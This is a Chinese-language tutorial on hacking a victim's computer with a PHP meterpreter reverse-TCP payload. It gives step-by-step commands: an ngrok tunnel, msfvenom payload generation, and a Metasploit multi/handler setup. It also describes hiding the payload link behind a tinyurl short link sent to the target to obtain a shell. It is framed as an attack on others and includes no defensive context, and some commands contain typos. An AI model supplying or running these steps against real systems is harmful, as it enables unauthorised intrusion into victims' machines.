使用PHP有效负载和ngrok 进行黑客攻击
我们将使用PHP有效负载进行黑客攻击,在本教程中我们将使用msfvenom(其实就是MSF)。
Msfvenom包含在kali linux操作系统中
工具准备阶段
- 步骤1:安装ngrok
请按照说明书安装ngrok。
让我们从下载ngrok开始。在这里下载ngrok。https://ngrok.com/download.
一旦ngrok完成下载,解压缩Zip存档,然后将cd放入其中,例如“cd ngrok”。
cd ngrok
安装AuthToken(下面的auth代码是从ngrok.com帐户复制auth令牌的示例)。复制ngrok.com帐户中的身份验证代码,我们将使用该代码对隧道进行身份验证。您可以通过进入存储和使用ngrok的文件夹。“/ngrok authToken yourauthTokenhere”将保存身份验证代码。
例子
./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3
现在我们将创建一个安全的TCP隧道,打开一个新的TCP终端,键入ngrok TCP 4545,将端口号更改为您想使用的任何端口。
创建PHP有效负载
现在我们将使用msfvenom来创建PHP有效负载。
打开一个新的命令终端,在下面输入命令,将LPORT更改为启动ngrok时指定的端口。
msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=17928 R > home.php
启动多/处理程序
在新的命令终端中输入命令。
service postgrsql start
service apache2 start
将下面的命令输入终端
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 127.0.0.1
set port 17928
将php文件复制到/var/www/html
键入msf控制台终端中的漏洞。
缩短URL
访问tinyurl.com并缩短网址。
例如127.0.0.1:17928
向受害者发送缩短的微URL链接,因为我们是在本地环境中工作的,所以不用再输入网址,直接输入IP地址和后面的端口号访问就行
当你使用MSF发起攻击后,如果对方计算机访问了你的PHP网站,那么它将会被植入一个PHP级别的监听TCP程序并且激活,你就成功2获得了一个SHELL,接下来的工作不做介绍。
原理
通过使计算机访问指定微URL(IP)是对方计算机植入并且激活了网页自带的挂马,并且创建TCP反向会话连接,已达到反弹SHELL的目的来入侵目标计算机